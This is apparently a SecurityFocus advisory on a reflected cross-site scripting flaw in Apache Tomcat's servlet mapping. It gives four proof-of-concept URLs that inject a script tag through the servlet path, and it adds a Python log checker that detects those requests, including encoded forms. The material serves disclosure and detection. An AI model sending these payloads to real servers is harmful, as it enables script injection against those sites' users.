Apache Tomcat Servlet Mapping Cross Site Scripting Vulnerability

The following proofs of concept were provided by Matt Moore <matt@westpoint.ltd.uk>:

tomcat-server/servlet/org.apache.catalina.servlets.WebdavStatus/<SCRIPT>alert(document.domain)</SCRIPT>
tomcat-server/servlet/org.apache.catalina.ContainerServlet/<SCRIPT>alert(document.domain)</SCRIPT>
tomcat-server/servlet/org.apache.catalina.Context/<SCRIPT>alert(document.domain)</SCRIPT>
tomcat-server/servlet/org.apache.catalina.Globals/<SCRIPT>alert(document.domain)</SCRIPT>
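
A log check for the request shape listed above, as an added example that is not part of the original advisory: it flags `/servlet/<class>/` requests whose path info contains markup characters, undoing percent-encoding first so encoded forms of the same request are also caught. The log lines, the `SnoopServlet` name and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (not from a real server); addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /servlet/SnoopServlet/info HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2010:10:00:05 +0000] "GET /servlet/org.apache.catalina.Globals/<SCRIPT>alert(document.domain)</SCRIPT> HTTP/1.0" 404 731',
    '198.51.100.7 - - [01/Jan/2010:10:00:09 +0000] "GET /servlet/org.apache.catalina.Context/%3CSCRIPT%3Ealert(document.domain)%3C/SCRIPT%3E HTTP/1.0" 404 731',
    '198.51.100.8 - - [01/Jan/2010:10:00:12 +0000] "GET /servlet/org.apache.catalina.ContainerServlet/%253CSCRIPT%253E HTTP/1.0" 404 640',
    '192.0.2.10 - - [01/Jan/2010:10:00:20 +0000] "GET /docs/index.html?q=%3Cb%3E HTTP/1.1" 200 2048',
]

# Client address and request target from a common/combined-format log line.
LINE_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+"')
# /servlet/<class>/<path info>; the path info may itself contain slashes.
SERVLET_RE = re.compile(r'/servlet/([^/]+)/(.+)', re.DOTALL)


def fully_decode(value, max_rounds=3):
    """Undo up to max_rounds layers of percent-encoding."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def flag_servlet_markup(lines):
    """Return (client, servlet_class, decoded_path_info) for flagged requests."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line this parser understands
        client, target = m.groups()
        path = fully_decode(target.split("?", 1)[0])  # path only, query dropped
        s = SERVLET_RE.search(path)
        if s and re.search(r"[<>]", s.group(2)):
            hits.append((client, s.group(1), s.group(2)))
    return hits


if __name__ == "__main__":
    for hit in flag_servlet_markup(SAMPLE_LOG):
        print(hit)
```
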


 

Copyright 2010, SecurityFocus